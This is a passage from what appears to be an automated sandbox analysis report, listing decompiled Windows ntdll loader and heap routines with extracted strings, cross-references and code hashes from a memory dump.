                                  					_t91 =  *(_t103 + 2);
                                  				}
                                  				 *(_t103 + 2) = _t91 & 0x00000017;
                                  				_t65 = 1;
                                  				goto L13;
                                  			}































                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                  • API String ID: 2994545307-2586055223
                                  • Opcode ID: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                                  • Instruction ID: e63587cfd8a1de468d961eb1a77c1e6ee5d0ca8cd4cc3abb1b50e1039c7b3791
                                  • Opcode Fuzzy Hash: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                                  • Instruction Fuzzy Hash: 3651F4322056819FE712EB6CC884FA777E8EB80B54F190568F959CB3D1D764EA40CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E018C8E00(void* __ecx) {
                                  				signed int _v8;
                                  				char _v12;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t32;
                                  				intOrPtr _t35;
                                  				intOrPtr _t43;
                                  				void* _t46;
                                  				intOrPtr _t47;
                                  				void* _t48;
                                  				signed int _t49;
                                  				void* _t50;
                                  				intOrPtr* _t51;
                                  				signed int _t52;
                                  				void* _t53;
                                  				intOrPtr _t55;
                                  
                                  				_v8 =  *0x198d360 ^ _t52;
                                  				_t49 = 0;
                                  				_t48 = __ecx;
                                  				_t55 =  *0x1988464; // 0x75150110
                                  				if(_t55 == 0) {
                                  					L9:
                                  					if( !_t49 >= 0) {
                                  						if(( *0x1985780 & 0x00000003) != 0) {
                                  							E01915510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                  						}
                                  						if(( *0x1985780 & 0x00000010) != 0) {
                                  							asm("int3");
                                  						}
                                  					}
                                  					return E018DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                  				}
                                  				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                  				_t43 =  *0x1987984; // 0x1432b30
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                  					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                  					if(_t48 == _t43) {
                                  						_t50 = 0x5c;
                                  						if( *_t32 == _t50) {
                                  							_t46 = 0x3f;
                                  							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                  								_t32 = _t32 + 8;
                                  							}
                                  						}
                                  					}
                                  					_t51 =  *0x1988464; // 0x75150110
                                  					 *0x198b1e0(_t47, _t32,  &_v12);
                                  					_t49 =  *_t51();
                                  					if(_t49 >= 0) {
                                  						L8:
                                  						_t35 = _v12;
                                  						if(_t35 != 0) {
                                  							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                  								E018C9B10( *((intOrPtr*)(_t48 + 0x48)));
                                  								_t35 = _v12;
                                  							}
                                  							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                  						}
                                  						goto L9;
                                  					}
                                  					if(_t49 != 0xc000008a) {
                                  						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                  							if(_t49 != 0xc00000bb) {
                                  								goto L8;
                                  							}
                                  						}
                                  					}
                                  					if(( *0x1985780 & 0x00000005) != 0) {
                                  						_push(_t49);
                                  						E01915510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                  						_t53 = _t53 + 0x1c;
                                  					}
                                  					_t49 = 0;
                                  					goto L8;
                                  				} else {
                                  					goto L9;
                                  				}
                                  			}

                                  Strings
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 01909357
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 0190933B, 01909367
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0190932A
                                  • LdrpFindDllActivationContext, xrefs: 01909331, 0190935D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                                  • Instruction ID: 57f4519c4c79b1ce37f524deda989cc4fffb860143210e900c7f3b5bd96e751e
                                  • Opcode Fuzzy Hash: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                                  • Instruction Fuzzy Hash: 33411E31A803199FEB36AA5CC888A397764AB43F58F06416DE508D7192E770EF80CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                  • API String ID: 2994545307-336120773
                                  • Opcode ID: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                                  • Instruction ID: 7634f567299893e3034d005b7b6c428e1a16696b42b82a6bedd463509256956f
                                  • Opcode Fuzzy Hash: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                                  • Instruction Fuzzy Hash: 1A312471200500EFD7E1DB9DC889F67B7A8EF01B21F184469F909EB251F670EA80CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-3178619729
                                  • Opcode ID: 6b82f59c995e8603e10fa505126a483ed134e58a0827932ebfb2278ba207ba26
                                  • Instruction ID: 36b65855d1971f1c2865f87eb84b76a57ef275caf513ad81f245b015e7632b47
                                  • Opcode Fuzzy Hash: 6b82f59c995e8603e10fa505126a483ed134e58a0827932ebfb2278ba207ba26
                                  • Instruction Fuzzy Hash: C1220770A002469FEB26CF1CC484B7ABBF9EF45704F188569E54ACB382E775DA80CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 018F9C18
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 018F9C28
                                  • LdrpDoPostSnapWork, xrefs: 018F9C1E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 2994545307-1948996284
                                  • Opcode ID: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                                  • Instruction ID: 124877fc518c5a2367806108fa23fa2b66f981099694130e6f0b0af8eaa95717
                                  • Opcode Fuzzy Hash: c8aba4aedb160d1413e1d0a3ac3a6b7f6e109412b04a63a4325e1ae15fcf22ac
                                  • Instruction Fuzzy Hash: 3291F671A0021A9FFB18DF5DD480A7A77B5FF45315B954069EA05DB241DB30EF01CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • HEAP[%wZ]: , xrefs: 0190A0AD
                                  • HEAP: , xrefs: 0190A0BA
                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0190A0CD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                  • API String ID: 0-1340214556
                                  • Opcode ID: abfa30671d3d26bca8875a13ef3bf5645e426b066078eb3032c1eaa3bf7c1d73
                                  • Instruction ID: ee5dec22ff26fc21ab5b26074e9e6f624656066cedfe428fd162f5964462f289
                                  • Opcode Fuzzy Hash: abfa30671d3d26bca8875a13ef3bf5645e426b066078eb3032c1eaa3bf7c1d73
                                  • Instruction Fuzzy Hash: 0181E731604649EFD726CB6CC884FA9BBF8FF05B15F0445A9E645C7292E774EA40CB11
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-1334570610
                                  • Opcode ID: 82692dfc3d3afaba037f14ad89ed9d65df6b20aae0e50e30198d7f1948cd20aa
                                  • Instruction ID: c80112081743f4f966be7eb3b9c664d6227de5d3607632eeee0dd5d7049c43df
                                  • Opcode Fuzzy Hash: 82692dfc3d3afaba037f14ad89ed9d65df6b20aae0e50e30198d7f1948cd20aa
                                  • Instruction Fuzzy Hash: 1361D070600605DFDB29DF28C484BAABBE5FF45304F18856EE849CB392D770EA81CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 018F9891
                                  • minkernel\ntdll\ldrmap.c, xrefs: 018F98A2
                                  • LdrpCompleteMapModule, xrefs: 018F9898
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  • API String ID: 0-1676968949
                                  • Opcode ID: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                                  • Instruction ID: 34b6712a80e575cbdccda5a8111dacd282351554daed2dfe6d83abdae06b8030
                                  • Opcode Fuzzy Hash: 24f78c72c22802fab7ad4048116af6c3defb86b5fafef187ac72d27926b14b3d
                                  • Instruction Fuzzy Hash: E851E031A0078A9BFB21CB6CC984B6A7BE4AB41B18F840599EB51DB3D1D735EF00C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0194256F
                                  • HEAP[%wZ]: , xrefs: 0194254F
                                  • HEAP: , xrefs: 0194255C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                  • API String ID: 0-3815128232
                                  • Opcode ID: 5c75163820776478bd95106fa6423da01846c522a86dd7c2d3d9d9c016decbfe
                                  • Instruction ID: 82b9ab84a7f3ff8b1a02ec26dcda3776372125f6aef47d7320f9dfff8919a693
                                  • Opcode Fuzzy Hash: 5c75163820776478bd95106fa6423da01846c522a86dd7c2d3d9d9c016decbfe
                                  • Instruction Fuzzy Hash: 025101342042508BE334DB2EE884F727BF5FB48B46F554C59F8CACB285E669D846DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • InstallLanguageFallback, xrefs: 0189E6DB
                                  • @, xrefs: 0189E6C0
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0189E68C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  • API String ID: 0-1757540487
                                  • Opcode ID: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                                  • Instruction ID: 9411817b6550f3184ed7d93474d7a0333b8afc6b411e900f1cabd68c891a1fd0
                                  • Opcode Fuzzy Hash: d92726197eb7ef754792709929e190440e13afac2e6c3d4c4918c6a43c167342
                                  • Instruction Fuzzy Hash: 0B517FB26083469BDB14DF68C480A6BB7E8BF98715F45092EFA85D7240F734DB04C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-2558761708
                                  • Opcode ID: 968fc38f32fd7f3fbe88eb097aeb850412b9e1dce76c197053c53253eb99d571
                                  • Instruction ID: bfca9d972bd30f19b70608570d3a9a9d9706b22a788ee688b84f8f722f3c2da8
                                  • Opcode Fuzzy Hash: 968fc38f32fd7f3fbe88eb097aeb850412b9e1dce76c197053c53253eb99d571
                                  • Instruction Fuzzy Hash: 5611E6317145069FEB29DB19C4C4FBAB7A5EF40B24F28846DE00ACB351E674DA40C751
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction ID: 05dd41b8ed577af8b5584a9be9a998602f2c90e770a24d944b3154d97e6e957b
                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction Fuzzy Hash: 4B91AF712043429FE764CE29C840B1BBBE9AF84714F14892DFA99DB280E771EA04CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                                  • Instruction ID: cb63c461c44a867cd0bd6994ccb18b0006c9f16bf93bd85cc6fb0ca09a0d456f
                                  • Opcode Fuzzy Hash: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                                  • Instruction Fuzzy Hash: F1517E71E00609DFEB25DFA8C880AADBBF8FF89700F16442DE609EB255D7719A41CB10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018BB9A5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 885266447-0
                                  • Opcode ID: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                                  • Instruction ID: 8db232d556e0cebf4fde681842c3f093cdae240f07d6bca3b571462d14bf3075
                                  • Opcode Fuzzy Hash: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                                  • Instruction Fuzzy Hash: A0515671A09341CFC721CF2CC4C092ABBE9BB88714F54896EEA95D7355D770EA44CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: _vswprintf_s
                                  • String ID:
                                  • API String ID: 677850445-0
                                  • Opcode ID: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                                  • Instruction ID: ce5285865a2780fa3f1b0083e058a57bce231662fac3dd41bdef87bd2afef046
                                  • Opcode Fuzzy Hash: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                                  • Instruction Fuzzy Hash: B851E171E1025A8EDF35CF68C844BAEBBB0AF01714F1442AEDA59EB292D7704A45CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                                  • Instruction ID: 0cde5366ca1c58314600aa25a42a2a22481bf368ef8d6ccec709f9fb47ff9775
                                  • Opcode Fuzzy Hash: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                                  • Instruction Fuzzy Hash: 9AC17D75D00219DBDB25DFACD880AADBBB6FF48B44F49402DE505EB290D734EA42CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0190BE0F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                  • API String ID: 0-865735534
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Re-Waiting
                                  • API String ID: 0-316354757
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  • API String ID: 0-2202222882
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  • API String ID: 0-215506332
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  • API String ID: 0-3583428290
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • Critical error detected %lx, xrefs: 01948E21
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Critical error detected %lx
                                  • API String ID: 0-802127002
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0192FF60
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                  • API String ID: 0-1911121157
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  • Instruction Fuzzy Hash: 443114322006416FD362DB6CC848F6ABBEEEBC5761F184458ED4EAB742DA74EC41C760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction ID: dfab03478aac76d4dba342b180ec0489ba5fd0eade1716d0605459626da66268
                                  • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                  • Instruction Fuzzy Hash: FF31C3326047069BC719DF28C880A5BF7AAFFC0310F04492DF95A97741DE31E905C7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45017203de26e298b719a07cb4e3bed181481c82ba98de72915451d8c8fd72ab
                                  • Instruction ID: c65b6d66a71e85f16e7d04194fa39475ef89ada183b8ccb3d61a1adcad955263
                                  • Opcode Fuzzy Hash: 45017203de26e298b719a07cb4e3bed181481c82ba98de72915451d8c8fd72ab
                                  • Instruction Fuzzy Hash: DB417CB1D0020DAFDB24DFA9D940BEEBBF8EF48714F14812AE918E7240DB749A45CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bcf6bfa5d18f0e10773c4cd8966b9b4a535bb477450df280704e8521a691c2d9
                                  • Instruction ID: 9a59e2d0d83e1c97853030270301ab0c9e9fd68a7bfd7f3b03d7a9ae185b8e96
                                  • Opcode Fuzzy Hash: bcf6bfa5d18f0e10773c4cd8966b9b4a535bb477450df280704e8521a691c2d9
                                  • Instruction Fuzzy Hash: 193125312417059FCB26AB5CC880F6A7766FF50764F14472EF655CB1D2DB20EB00C691
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f181e894783d4278493ad76457b9cc55eacdc8d902500ea507759cd9a91efa79
                                  • Instruction ID: 1a5ad8e0a64b49348bdb3e005ebcbd9b9ee3045b0dbbcde64b0a1acaa30b5dc9
                                  • Opcode Fuzzy Hash: f181e894783d4278493ad76457b9cc55eacdc8d902500ea507759cd9a91efa79
                                  • Instruction Fuzzy Hash: 4031BEB1A01715DFD7258F2DC841A6ABBE5FF85700B05846AE949CB790EB30DA40CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ddf36aeaad330d64911240b1c484e26bc4d7122535d126efaffa6bee704ad635
                                  • Instruction ID: 1ce5f63a1d1c47ebac958a231edf147a371ccad84fe0ddc5b0c518c738aa7680
                                  • Opcode Fuzzy Hash: ddf36aeaad330d64911240b1c484e26bc4d7122535d126efaffa6bee704ad635
                                  • Instruction Fuzzy Hash: 6E416A75A00209DFDB19CF58C880BADBBF1BB89714F19806DE909EB385E774EA01CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction ID: 6854f0150772eba7ada9348da0e5cbe53bdefbce97b84d011e816fe8381eaaca
                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                  • Instruction Fuzzy Hash: 2A31C072601A4BAEE705EBB8C480BE9FB58BF52304F04815AD51CD7341DB346B49C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e837dd0d4c275e6cbadce5178162f0ddb782aa2a83d1eff9a2209bba57c41fc0
                                  • Instruction ID: ef463ccc67a6aa38309440e1d20965e0a0d2e3cfd38af2cf1fe30fffd4a2e735
                                  • Opcode Fuzzy Hash: e837dd0d4c275e6cbadce5178162f0ddb782aa2a83d1eff9a2209bba57c41fc0
                                  • Instruction Fuzzy Hash: C131E6726087569BC324DF6CC840A6AB7E9BFC8700F044A29F99987794E730E944C7A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 516000b4c02818d09d1668e412cdd45d70e07ea2bdd4b5e58c22b9e2a9d1792c
                                  • Instruction ID: e4d26bbe381460dd87475b39e712300359aa1c898ba3d8bca4f1f732f3d745e0
                                  • Opcode Fuzzy Hash: 516000b4c02818d09d1668e412cdd45d70e07ea2bdd4b5e58c22b9e2a9d1792c
                                  • Instruction Fuzzy Hash: 55318CB150A312DFCB24DF28D58085ABBE5FF85705F45896EE4989B251D730EA04CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19920398f5dbd17acde6ccf82952131425b15dcbd1f06e09498facf42d218b44
                                  • Instruction ID: 865e1e392e7722b7c2819f321b5b1fb89eed65c9ff3b00d93527b2477602b70a
                                  • Opcode Fuzzy Hash: 19920398f5dbd17acde6ccf82952131425b15dcbd1f06e09498facf42d218b44
                                  • Instruction Fuzzy Hash: EC31C4B1604209DFD729CF98D880F697BFAFB85B10F240959E259D7344E770DA01CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e2dda8fc6c299023e76638ee67f4ae62f8af3eeb1fece907aa299e9d59ae03c
                                  • Instruction ID: b374890dc58ef568fb0060225c1a7184ed8f9458bd72219f757915fcb25152b9
